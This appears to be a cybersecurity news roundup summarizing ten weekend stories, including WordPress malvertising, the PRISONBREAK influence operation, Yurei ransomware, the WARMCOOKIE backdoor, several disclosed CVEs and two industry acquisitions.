From digital deception to hidden backdoors, attackers are getting bolder and smarter in how they blend manipulation with malware. A malvertising campaign stealthily embedded malicious JavaScript inside small theme-level tweaks on WordPress sites, loading remote ad/redirect scripts that turned at least 17 sites into drive-by redirect hubs and hidden-iframe distributors. At the same time, a coordinated influence operation labeled PRISONBREAK deployed dozens of AI-generated images and videos to target Iranian audiences around the June Evin Prison strikes. Meanwhile, defenders are also tracking WARMCOOKIE (aka BadSpace), a backdoor that has been steadily upgraded with new tooling to preserve persistent access and stage secondary payloads. Read further for more cybersecurity news from the weekend.
01
A malvertising campaign hid malicious JavaScript inside small theme-level modifications on WordPress sites to load remote ad/redirect scripts, infecting visitors across at least 17 sites and enabling drive-by redirects and hidden iframes.
02
A coordinated influence operation, PRISONBREAK, used dozens of AI-generated images and videos and targeted Iranian audiences around the June strikes on Evin Prison — activity the researchers say was likely run by or on behalf of Israeli government actors or contractors.
03
Yurei, a new Go-written ransomware family, uses per-file ChaCha20 keys wrapped with ECIES, disables backups/volume shadow copies, wipes logs, and spreads via SMB, removable drives, and credential-based remote execution targeting Windows systems.
04
The WARMCOOKIE backdoor (aka BadSpace) has evolved with new features in the tooling used by threat actors to maintain persistent backdoor access and stage follow-on payloads.
05
Researchers reverse-engineered Asgard Protector, a premium, customizable crypter offering IP logging, anti-VM checks, autorun, and other evasion features, revealing advanced techniques used to hide malware from antivirus detection.
06
Attackers exploited a Zimbra Collaboration Suite XSS vulnerability in iCalendar files (tracked as CVE-2025-27915) in early-year zero-day attacks that targeted at least a Brazilian military organization via a spoofed Libyan Navy email.
07
QNAP disclosed a NetBak Replicator flaw tracked as CVE-2025-57714 affecting NetBak Replicator 4.5.x that could allow local attackers to execute unauthorized code.
08
A critical use-after-free vulnerability (CVE-2025-49844) in Redis’s Lua scripting subsystem could enable authenticated attackers to achieve remote code execution.
09
Dublin-based security-first MSP Ekco has acquired UK managed services provider Solsoft Group; the price was not publicly disclosed.
10
An AI-driven detection and response company, Vectra AI, has acquired Netography, a cloud-native network observability firm — the deal terms have not been disclosed.
